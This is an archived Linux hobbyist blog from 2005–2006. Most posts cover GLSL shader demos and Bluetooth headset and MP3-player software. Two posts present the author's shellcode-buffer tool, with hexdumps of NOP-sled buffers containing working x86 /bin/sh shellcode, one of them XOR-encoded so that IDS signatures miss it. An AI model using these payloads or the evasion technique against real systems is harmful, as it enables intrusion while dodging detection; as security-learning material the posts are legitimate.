Archive for the ‘Linux’ Category
Jan 5,2006
Updated my shellcode generation tool. Added shellcode encryption, to hide from IDS which scan for well known strings in the shellcode, like ‘/bin/sh’. The encryption is quite simple, just add,sub,xor or move by an fixed offset. The tool added also a hook to decode the shellcode before it gets called.
Changelog:
- Use getopt for command line parsing
- Fixed off by one bug in hex dump output
- Added simple shellcode encryption
./mkbuffer -m gen -l 256 -c xor -o 2 -f CODE -e CODE
------------------------------------------------------
Start: 0x0x80499a0
End: 0x0x80499c9
Len: 0x0029 (41 bytes)
jump: 0x00000000
------------------------------------------------------
Crypt Shellcode 'xor' offset='2'
------------------------------------------------------
0x0000:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0090:eb 11 5e 31 c9 b1 36 80 74 0e ff 02 80 e9 01 75
0x0075:f6 eb 05 e8 ea ff ff ff 33 c2 b2 44 33 d9 33 cb
0x00cb:cf 82 e9 12 59 33 c2 8a 41 05 52 51 8b e3 b2 09
0x0009:33 d0 cf 82 ea e9 fd fd fd 2d 60 6b 6c 2d 71 6a
0x006a:5a 92 92 92 57 8b e7 55 54 33 f4 51 ea 8c 90 90
0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0090:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
------------------------------------------------------
Writing Shellcode to 'CODE'
------------------------------------------------------
Starting Subshell
setup env $CODE
------------------------------------------------------
Nov 13,2005
Found some time to play with GLSL Extension. I started with a simple Cube Demo from NeHe using SDL for the user interface programming. Then i added GLEW as the GLSL extension wrapper. The Shader Programs are taken from Linux Magazin Article. Currently no own ideas 
First i had to refresh my OpenGL basics. So i added some switches to trigger Alpha Blending and different textures.
When running the demo you press following keys to trigger different effects:
- ‘l’ to toggle Light
- ‘b’ to enable Alpha Blend
- ‘f’ to step through NEAREST, LINEAR and MIPMAP textures
- ’s’ toggle current Shader Programm
- ‘n’ switch to different Shader Programms
Use the mouse and the left button to rotate the cube. The right button and mouse motion to zoom into the scene. The code was tested with a Nvida GT6800 card. You’ll need nvidia GL library, Glew and SDLlib to build it from sources.
Toonshading
Deformation
Mipmapped Texture
Nov 2,2005
Inspired by an article in german Hakin9 Magazin from October 2005, i wrote a little programm to test and generate shellcode.A good place to learn about buffer overflows is here. I found a interesting python framwork called inlinegg for shellcode generating. This make shellcode developing really easy and effective.
My simple tool is used to prepare buffers with shellcode.The actual asm code is done with nasm and linked a against a gcc main programm. The programm has three modes: dump, exec and gen.
Dump does a hexdump of the plain shellcode, usefull when tracing null bytes.
For testing the functionality of the shellcode you can use exec which simple calls the shellcode like function.
Gen is used to build a buffer with the actual shellcode. The code is hexdumped to stdout, raw code it written to stderr and also the enviroment var $CODE is set. Also the target buffer size and stack jump address as to be passed to the program. The buffer ist first filled with the jump address and then the first half with NOPs overwritten. The shellcode gets copied to the middle of the buffer.
./mkbuffer gen 256 0x1234567
Start: 0x0x8048bb0
End: 0x0x8048bd9
Len: 0x29 (41 bytes)
jump: 0x1234567
90
0x0000:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0010:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0020:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0030:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0040:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0050:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0060:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0070:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 31
0x0080:c0 b0 46 31 db 31 c9 cd 80 eb 10 5b 31 c0 88 43
0x0090:07 50 53 89 e1 b0 0b 31 d2 cd 80 e8 eb ff ff ff
0x00a0:2f 62 69 6e 2f 73 68 58 45 23 01 67 45 23 01 67
0x00b0:45 23 01 67 45 23 01 67 45 23 01 67 45 23 01 67
0x00c0:45 23 01 67 45 23 01 67 45 23 01 67 45 23 01 67
0x00d0:45 23 01 67 45 23 01 67 45 23 01 67 45 23 01 67
0x00e0:45 23 01 67 45 23 01 67 45 23 01 67 45 23 01 67
0x00f0:45 23 01 67 45 23 01 67 45 23 01 67 45 23 01
setup env $CODE
Oct 30,2005
A new Kbtsco release is available. Did some small tweaks.
- Added Channel Forcing via Configure Menu. Some people reported having problems with the channel auto dedection, so that it’s now possible to asign the channel manually.
- Added Cancel Menu item to interrupt the connect process, in case somebody hits the Connect button when no headset is available.
- Switched Build System from Autotools to bksys.
Jun 5,2005
The Alsa-Bluetooth project project provides a way to use a bluetooth headset with Linux.They do this currently by making an alsa kernel driver which uses bluez to reach the headset.
I Wrote a KDE based user space daemon wich works as drop in replacement for the btsco daemon from the Alsa-Bluetooth package. The Programm is in early beta stage. Just start it from the Console and you will have a small kicker applet in your Systray. KBtsco has a function to discover the BAddr of your Headset. Once you did the pairing via e.g. KBluetoothd package, you can click the headset icon in the Systray to connect to the headset. All actions get visualized via On-Screen-Display in the right corner of your monitor. After connecting you can push your connect button on the headset wich actually opens the sco socket. I used this tool on daily basis with Skype. Sometimes sndbtsco seems to crash and eats all CPU time,it’s still beta i think.
May 12,2005
After reading the CT article about the BlueMp3 player, i knew i need this piece of hardware. It’s an bluetooth mp3 player based on the Atmel Mega128 cpu. The firmware source is available and the client is linux based. So what do i need more to play around? I ordered the pcb and parts at Segor. The Bluetooth module and the Atmega was pre-solderd, because it’s not easy to solder TQFP’s at home. The thing was build after a hour of soldering and worked perfect. But the bluetooth signal just worked over 5 meters. So i added an Lambda/4 antenna (thanks tobi) to the bluetooth module, which extented the coverage up to 20 meters. But what i really needed was a GUI to play my mp3s. Since iam KDE user i deciced to programm my own Gui called k2send. I setup a project page a berlios for it.
Categories
Archives
Links
Meta
Recent Comments
- gromick: hi im actually working on
- gromick: hi im actually working on
- foo: I did the upgrade and
- Dar: Hello. Ok, then ? how to sniff
- Kool: Hi i am trying to
- Administrator: Yes, u need to use
- WATIS: Okay, got it. bccmd -d hci0
- WATIS: Hi, I was trying to do
- Administrator: You have change some stuff:
- Kitti Thongsri: Hi Sir How can be